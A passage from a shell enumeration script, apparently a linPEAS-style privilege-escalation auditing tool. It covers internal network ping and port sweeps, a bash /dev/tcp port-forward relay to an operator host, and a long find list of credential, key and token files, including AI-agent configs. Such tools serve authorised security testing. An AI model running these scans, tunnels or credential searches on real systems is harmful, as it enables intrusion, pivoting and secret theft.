    463   if ! [ "$Wfolder" ]; then
    464     Wfolder="$(printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1)"
    465   fi
    466   printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1
    467   if [ $? -eq 0 ]; then
    468       SEDOVERFLOW=false
    469   else
    470       MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1
    471   fi
    472   if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop
    473      SEDOVERFLOW=false
    474   fi
    475 done
    476 #Get HOMESEARCH
    477 if [ "$SEARCH_IN_FOLDER" ]; then
    478   HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
    479 else
    480   HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users|^/var/www" | tr "\n" " ")"
    481   if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www"; then #If not listed and not in /home, /Users/, /root, or /var/www add current home folder
    482     HOMESEARCH="$HOME $HOMESEARCH"
    483   fi
    484 fi
    485 GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|"
    486 
    487 basic_net_info(){
    488   print_title "Basic Network Info"
    489   (ifconfig || ip a) 2>/dev/null
    490   echo ""
    491 }
    492 port_forward (){
    493   LOCAL_IP=$1
    494   LOCAL_PORT=$2
    495   REMOTE_IP=$3
    496   REMOTE_PORT=$4
    497   echo "In your machine execute:"
    498   echo "cd /tmp; rm backpipe; mknod backpipe p;"
    499   echo "nc -lvnp $LOCAL_PORT 0<backpipe | nc -lvnp 9009 1>backpipe"
    500   echo ""
    501   read -p "Press any key when you have executed those commands" useless_var
    502   bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &"
    503   echo "If not error was indicated, your host port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT"
    504 }
    505 select_nc (){
    506   #Select the correct configuration of the netcat found
    507   NC_SCAN="$FOUND_NC -v -n -z -w 1"
    508   $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
    509   if [ $? -eq 2 ]
    510   then
    511     NC_SCAN="timeout 1 $FOUND_NC -v -n"
    512   fi
    513 }
    514 icmp_recon (){
    515   #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
    516 	IP3=$(echo $1 | cut -d "." -f 1,2,3)
    517   (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
    518   (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
    519 	for j in $(seq 0 254)
    520 	do
    521     (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
    522 	done
    523   wait
    524 }
    525 tcp_recon (){
    526   #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
    527   IP3=$(echo $1 | cut -d "." -f 1,2,3)
    528 	PORTS=$2
    529   printf ${YELLOW}"[+]${GREEN} From $IP3 ${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
    530   printf "$NC\n"
    531   for p in $PORTS; do
    532     for j in $(seq 1 254)
    533     do
    534       if [ "$FOUND_BASH" ] && [ "$(command -v timeout 2>/dev/null || echo -n '')" ]; then
    535         timeout 2.5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$p) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$p\"" &
    536       elif [ "$NC_SCAN" ]; then
    537         ($NC_SCAN "$IP3"."$j" "$p" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
    538       fi
    539     done
    540     wait
    541   done
    542 }
    543 discovery_port_scan (){
    544   basic_net_info
    545   #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
    546   print_title "Internal Network Discovery - Finding hosts and scanning ports"
    547   DISCOVERY=$1
    548   MYPORTS=$2
    549   IP=$(echo "$DISCOVERY" | cut -d "/" -f 1)
    550   NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2)
    551   echo "Scanning: $DISCOVERY"
    552   if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then
    553     printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC;
    554     if [ "$IP" = "$NETMASK" ]; then
    555       printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i <IP> [-p <PORT(s)>]\n\n"$NC;
    556     fi
    557     printf ${BLUE}"$HELP"$NC;
    558     exit 0
    559   fi
    560   PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')"
    561   PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions
    562   if [ "$NETMASK" -eq "24" ]; then
    563     printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC
    564 		tcp_recon "$IP" "$PORTS"
    565 	elif [ "$NETMASK" -eq "16" ]; then
    566     printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC
    567 		for i in $(seq 0 255)
    568 		do
    569 			NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1
    570 			tcp_recon "$NEWIP" "$PORTS"
    571 		done
    572   else
    573       printf $RED"[-] Err: Sorry, only netmask /24 and /16 are supported in port discovery mode. Netmask detected: $NETMASK\n"$NC;
    574       exit 0
    575 	fi
    576 }
    577 tcp_port_scan (){
    578   #Scan open ports of a host. Default: nmap top 1000, but the user can select others
    579   basic_net_info
    580   print_title "Network Port Scanning"
    581   IP=$1
    582 	PORTS="$2"
    583   if [ -z "$PORTS" ]; then
    584     printf ${YELLOW}"[+]${GREEN} From $IP ${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " "
    585     printf "$NC\n"
    586     PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389"
    587   else
    588     PORTS="$(echo $PORTS | tr ',' ' ')"
    589     printf ${YELLOW}"[+]${GREEN} From $IP ${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
    590     printf "$NC\n"
    591   fi
    592   for p in $PORTS; do
    593     if [ "$FOUND_BASH" ]; then
    594       $FOUND_BASH -c "(echo </dev/tcp/$IP/$p) 2>/dev/null && echo -n \"[+] Open port at: $IP:$p\"" &
    595     elif [ "$NC_SCAN" ]; then
    596       ($NC_SCAN "$IP" "$p" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
    597     fi
    598   done
    599   wait
    600 }
    601 discover_network (){
    602   #Check if IP and Netmask are correct and the use fping or ping to find hosts
    603   basic_net_info
    604   print_title "Network Discovery"
    605   DISCOVERY=$1
    606   IP=$(echo "$DISCOVERY" | cut -d "/" -f 1)
    607   NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2)
    608   if [ -z "$IP" ] || [ -z "$NETMASK" ]; then
    609     printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC;
    610     printf ${BLUE}"$HELP"$NC;
    611     exit 0
    612   fi
    613   #Using fping if possible
    614   if [ "$FPING" ]; then
    615     $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED},"
    616   #Loop using ping
    617   else
    618     if [ "$NETMASK" -eq "24" ]; then
    619       printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC"
    620       icmp_recon $IP
    621     elif [ "$NETMASK" -eq "16" ]; then
    622       printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC"
    623       for i in $(seq 1 254)
    624       do
    625         NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1
    626         icmp_recon "$NEWIP"
    627       done
    628     else
    629       printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping mode. Netmask detected: $NETMASK"$NC;
    630       exit 0
    631     fi
    632   fi
    633 }
    634 if [ "$PORTS" ]; then
    635   if [ "$SCAN_BAN_GOOD" ]; then
    636     if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then
    637       printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC;
    638       printf ${BLUE}"$HELP"$NC;
    639       exit 0
    640     else
    641       #Select the correct configuration of the netcat found
    642       select_nc
    643     fi
    644   else
    645     printf $RED"  Err: Port scan not possible, any netcat in PATH\n"$NC;
    646     printf ${BLUE}"$HELP"$NC;
    647     exit 0
    648   fi
    649 fi
    650 if [ "$DISCOVERY" ]; then
    651   if [ "$PORTS" ]; then
    652     discovery_port_scan $DISCOVERY $PORTS
    653   else
    654     if [ "$DISCOVER_BAN_GOOD" ]; then
    655       discover_network $DISCOVERY
    656     else
    657       printf $RED"  Err: Discovery not possible, no fping or ping in PATH\n"$NC;
    658     fi
    659   fi
    660   exit 0
    661 elif [ "$IP" ]; then
    662   select_nc
    663   tcp_port_scan $IP "$PORTS"
    664   exit 0
    665 fi
    666 if [ "$PORT_FORWARD" ]; then
    667   if ! [ "$FOUND_BASH" ]; then
    668     printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC;
    669     exit 0
    670   fi
    671   LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)"
    672   LOCAL_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 2)"
    673   REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 3)"
    674   REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)"
    675   if ! [ "$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT" ]; then
    676     printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
    677     exit 0
    678   fi
    679   #Check if LOCAL_PORT is a number
    680   if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
    681     printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
    682   fi
    683   #Check if REMOTE_PORT is a number
    684   if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
    685     printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
    686   fi
    687   port_forward "$LOCAL_IP" "$LOCAL_PORT" "$REMOTE_IP" "$REMOTE_PORT"
    688   exit 0
    689 fi
    690 if [ "$AUTO_NETWORK_SCAN" ]; then
    691   basic_net_info
    692   if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
    693     printf $RED"[-] $SCAN_BAN_BAD\n$NC"
    694     echo "The network is not going to be scanned..."
    695   elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip  || echo -n '')" ]; then
    696     printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
    697     echo "The network is not going to be scanned..."
    698   else
    699     print_2title "Scanning local networks (using /24)"
    700     if ! [ "$PING" ] && ! [ "$FPING" ]; then
    701       printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
    702     fi
    703     select_nc
    704     local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
    705     printf "%s\n" "$local_ips" | while read local_ip; do
    706       if ! [ -z "$local_ip" ]; then
    707         print_3title "Discovering hosts in $local_ip/24"
    708         if [ "$PING" ] || [ "$FPING" ]; then
    709           discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
    710         fi
    711         discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
    712         sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
    713         rm $Wfolder/.ips.tmp 2>/dev/null
    714         while read disc_ip; do
    715           me=""
    716           if [ "$disc_ip" = "$local_ip" ]; then
    717             me=" (local)"
    718           fi
    719           echo "Scanning top ports of ${disc_ip}${me}"
    720           (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
    721           echo ""
    722         done < $Wfolder/.ips
    723         rm $Wfolder/.ips 2>/dev/null
    724         echo ""
    725       fi
    726     done
    727     print_3title "Scanning top ports of host.docker.internal"
    728     (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
    729     echo ""
    730   fi
    731   exit 0
    732 fi
    733 
    734 if [ "$SEARCH_IN_FOLDER" ]; then
    735   printf $GREEN"Caching directories "$NC
    736   CONT_THREADS=0
    737   # FIND ALL KNOWN INTERESTING SOFTWARE FILES
    738   FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"microk8s\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"services\" -o -name \"containerd\" -o -name \"system-services\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system-local.d\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"kube-proxy\" -o -name \"mysql\" -o -name \"kubernetes.io\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \".cloudflared\" -o -name \"etcd\" -o -name \"k0s\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"pam.d\" -o -name \"kubernetes\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"system.d\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"wpa_supplicant\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"system-connections\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    739   FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \"ssh-agent.sock\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"*knockd*\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"sess_*\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"krb5.conf\" -o -name \"rsyncd.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"passwd.ibd\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"exports\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"agent.*\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name 